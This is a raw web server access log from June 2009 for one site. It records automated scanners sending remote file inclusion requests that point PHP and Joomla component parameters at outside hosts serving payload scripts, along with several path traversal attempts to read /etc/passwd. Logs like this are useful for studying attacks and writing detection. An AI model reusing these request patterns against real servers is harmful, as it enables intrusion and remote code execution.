116.121.201.73 - - [29/Jun/2009:12:24:22 -0700] "GET /logs/access.log///components/com_performs/performs.php?mosConfig_absolute_path=http://interherbe.free.fr/raid//pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
116.121.201.73 - - [29/Jun/2009:12:24:29 -0700] "GET /logs/access.log///components/com_performs/performs.php?mosConfig_absolute_path=http://interherbe.free.fr/raid//pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
217.147.29.190 - - [29/Jun/2009:12:29:35 -0700] "GET /logs/access_090510.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
217.147.29.190 - - [29/Jun/2009:12:29:35 -0700] "GET /logs/access_090309.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
194.63.248.44 - - [29/Jun/2009:12:31:12 -0700] "GET /logs/access_090309.log/?INCLUDE_FOLDER=http://powerkeepers.net/powerbox/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
194.63.248.44 - - [29/Jun/2009:12:31:12 -0700] "GET /?INCLUDE_FOLDER=http://powerkeepers.net/powerbox/copyright.txt???? HTTP/1.1" 200 919 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
194.63.248.44 - - [29/Jun/2009:12:31:12 -0700] "GET /logs/access_090222.log/?INCLUDE_FOLDER=http://powerkeepers.net/powerbox/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
194.63.248.44 - - [29/Jun/2009:12:31:12 -0700] "GET /logs/?INCLUDE_FOLDER=http://powerkeepers.net/powerbox/copyright.txt???? HTTP/1.1" 200 3083 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
72.82.228.83 - - [29/Jun/2009:12:32:14 -0700] "GET /logs/access_090309.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.82.228.83 - - [29/Jun/2009:12:32:14 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.82.228.83 - - [29/Jun/2009:12:32:14 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.82.228.83 - - [29/Jun/2009:12:32:15 -0700] "GET /logs/access_090510.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:12:33:27 -0700] "GET /errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:12:33:27 -0700] "GET /logs/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:12:33:27 -0700] "GET /logs/access_090420.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
74.6.17.172 - - [29/Jun/2009:12:33:57 -0700] "GET /sitebuilder/?N=A HTTP/1.0" 200 520 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
82.194.87.219 - - [29/Jun/2009:12:34:23 -0700] "GET /logs//errors.php?error=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:12:34:29 -0700] "GET /logs/access_090316.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:12:35:46 -0700] "GET /logs/access_090420.log%20%20/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.120.231.11 - - [29/Jun/2009:12:38:28 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://hrd.doae.go.th/httpd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.120.231.11 - - [29/Jun/2009:12:38:28 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://hrd.doae.go.th/httpd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.120.231.11 - - [29/Jun/2009:12:38:28 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://hrd.doae.go.th/httpd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:12:41:55 -0700] "GET /logs/access_090316.log%20%20/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.120.231.11 - - [29/Jun/2009:12:53:26 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://hrd.doae.go.th/httpd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.237.82.158 - - [29/Jun/2009:12:57:21 -0700] "GET /includes/class_item.php?fileExtension=http://www.kyouikusaikou.net/blog_student/include/redame.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:01:45 -0700] "GET /logs/////objects/extern/spaw/spaw_control.class.php?spaw_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:01:45 -0700] "GET /logs/access_090420.log%20%20/////objects/extern/spaw/spaw_control.class.php?spaw_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:01:45 -0700] "GET ////objects/extern/spaw/spaw_control.class.php?spaw_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:01:46 -0700] "GET /logs/access_090420.log%20%20/////objects/extern/spaw/spaw_control.class.php?spaw_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:01:46 -0700] "GET /logs/////objects/extern/spaw/spaw_control.class.php?spaw_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:01:46 -0700] "GET ////objects/extern/spaw/spaw_control.class.php?spaw_root=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:06:54 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:06:54 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:06:54 -0700] "GET /logs/access_090420.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:07:18 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:07:18 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:07:18 -0700] "GET /logs/access_090420.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:07:44 -0700] "GET /logs/access.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:07:51 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:09:13 -0700] "GET /logs/access_090420.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.237.82.158 - - [29/Jun/2009:13:09:15 -0700] "GET /logs/access_090420.log//includes/class_item.php?fileExtension=http://www.kyouikusaikou.net/blog_student/include/redame.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.toulouseangloexchange.com"
69.237.82.158 - - [29/Jun/2009:13:09:15 -0700] "GET /logs//includes/class_item.php?fileExtension=http://www.kyouikusaikou.net/blog_student/include/redame.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:09:25 -0700] "GET /logs/access.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:13:37 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:19:13 -0700] "GET /logs/access.log%20%20/administrator/components/com_performs/lib/lib_phpForm.php?arrForm=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:19:13 -0700] "GET /administrator/components/com_performs/lib/lib_phpForm.php?arrForm=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:19:14 -0700] "GET /logs/administrator/components/com_performs/lib/lib_phpForm.php?arrForm=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:19:14 -0700] "GET /administrator/components/com_performs/lib/lib_phpForm.php?arrForm=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:19:14 -0700] "GET /logs/administrator/components/com_performs/lib/lib_phpForm.php?arrForm=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:19:14 -0700] "GET /logs/access.log%20%20/administrator/components/com_performs/lib/lib_phpForm.php?arrForm=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:20:59 -0700] "GET /logs/administrator/components/com_performs/lib/lib_phpForm.php?absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:20:59 -0700] "GET /administrator/components/com_performs/lib/lib_phpForm.php?absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:20:59 -0700] "GET /logs/access.log%20%20/administrator/components/com_performs/lib/lib_phpForm.php?absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:21:01 -0700] "GET /administrator/components/com_performs/lib/lib_phpForm.php?absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:21:01 -0700] "GET /logs/administrator/components/com_performs/lib/lib_phpForm.php?absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:21:02 -0700] "GET /logs/access.log%20%20/administrator/components/com_performs/lib/lib_phpForm.php?absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
89.253.238.151 - - [29/Jun/2009:13:23:01 -0700] "GET /logs/administrator/components/com_performs/lib/lib_phpForm.php?absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
89.253.238.151 - - [29/Jun/2009:13:23:01 -0700] "GET /logs/access.log%20%20/administrator/components/com_performs/lib/lib_phpForm.php?absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
89.253.238.151 - - [29/Jun/2009:13:23:01 -0700] "GET /administrator/components/com_performs/lib/lib_phpForm.php?absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
89.253.238.151 - - [29/Jun/2009:13:23:17 -0700] "GET /administrator/components/com_performs/lib/lib_phpForm.php?absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
89.253.238.151 - - [29/Jun/2009:13:23:17 -0700] "GET /logs/access.log%20%20/administrator/components/com_performs/lib/lib_phpForm.php?absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
89.253.238.151 - - [29/Jun/2009:13:23:17 -0700] "GET /logs/administrator/components/com_performs/lib/lib_phpForm.php?absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.237.82.158 - - [29/Jun/2009:13:26:45 -0700] "GET /logs/access_090504.log//includes/class_item.php?fileExtension=http://www.kyouikusaikou.net/blog_student/include/redame.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:26:48 -0700] "GET /logs/access.log/administrator/components/com_performs/lib/lib_phpForm.php?absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:26:55 -0700] "GET /logs/access.log/administrator/components/com_performs/lib/lib_phpForm.php?absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:29:16 -0700] "GET /logs/access.log/administrator/components/com_performs/lib/lib_phpForm.php?arrForm=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:29:32 -0700] "GET /logs/access.log/administrator/components/com_performs/lib/lib_phpForm.php?arrForm=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:41:43 -0700] "GET /logs/access_090420.log//config/dbutil.bck.php?confdir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:41:43 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:41:43 -0700] "GET /config/dbutil.bck.php?confdir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:42:00 -0700] "GET /logs/access_090420.log//config/dbutil.bck.php?confdir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:42:00 -0700] "GET /config/dbutil.bck.php?confdir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:42:00 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:43:50 -0700] "GET /logs/access_090420.log%20%20//config/dbutil.bck.php?confdir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:43:55 -0700] "GET /logs/access_090420.log%20%20//config/dbutil.bck.php?confdir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:13:48:52 -0700] "GET /logs/access_090413.log%20%20//trans/trans.php?trans=eng&page=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:13:48:52 -0700] "GET /logs//trans/trans.php?trans=eng&page=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:13:48:52 -0700] "GET /trans/trans.php?trans=eng&page=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:13:48:59 -0700] "GET /logs/access_090323.log%20%20//trans/trans.php?trans=eng&page=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:50:37 -0700] "GET /administrator/components/com_performs/lib/lib_phpForm.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:50:37 -0700] "GET /logs/administrator/components/com_performs/lib/lib_phpForm.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:50:37 -0700] "GET /logs/access.log%20%20/administrator/components/com_performs/lib/lib_phpForm.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:50:45 -0700] "GET /administrator/components/com_performs/lib/lib_phpForm.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:50:45 -0700] "GET /logs/access.log%20%20/administrator/components/com_performs/lib/lib_phpForm.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
69.72.169.233 - - [29/Jun/2009:13:50:45 -0700] "GET /logs/administrator/components/com_performs/lib/lib_phpForm.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:57:37 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:57:37 -0700] "GET /logs/access_090420.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:57:37 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:57:52 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:57:52 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
199.120.90.222 - - [29/Jun/2009:13:57:53 -0700] "GET /logs/access_090420.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
72.82.228.83 - - [29/Jun/2009:14:06:18 -0700] "GET //trans/trans.php?trans=fr&page=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.82.228.83 - - [29/Jun/2009:14:06:18 -0700] "GET /logs///trans/trans.php?trans=fr&page=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.82.228.83 - - [29/Jun/2009:14:06:18 -0700] "GET /logs/access_090413.log///trans/trans.php?trans=fr&page=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.82.228.83 - - [29/Jun/2009:14:06:20 -0700] "GET /logs/access_090323.log///trans/trans.php?trans=fr&page=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.197.183.21 - - [29/Jun/2009:15:02:32 -0700] "GET /?sourcedir=http://www.eyepro.net//assets/images/tanii?????????????? HTTP/1.1" 200 919 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
66.197.183.21 - - [29/Jun/2009:15:09:24 -0700] "GET /logs/access_090427.log/?sourcedir=http://www.eyepro.net//assets/images/tanii?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
66.197.183.21 - - [29/Jun/2009:15:09:24 -0700] "GET /logs/?sourcedir=http://www.eyepro.net//assets/images/tanii?????????????? HTTP/1.1" 200 3083 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:15:11:00 -0700] "GET /logs/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:15:11:00 -0700] "GET /logs/access_090420.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:15:11:00 -0700] "GET /errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
80.93.48.103 - - [29/Jun/2009:15:11:06 -0700] "GET /logs/access_090420.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.48.103 - - [29/Jun/2009:15:11:06 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.48.103 - - [29/Jun/2009:15:11:07 -0700] "GET /logs/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:15:11:26 -0700] "GET /logs/access_090316.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:15:13:30 -0700] "GET /logs/access_090420.log%20%20/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
66.197.183.21 - - [29/Jun/2009:15:16:29 -0700] "GET /?sourcedir=http://www.eyepro.net//assets/images/tanii?????????????? HTTP/1.1" 200 919 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:15:18:54 -0700] "GET /logs/access_090316.log%20%20/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
66.11.230.36 - - [29/Jun/2009:15:21:28 -0700] "GET /reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
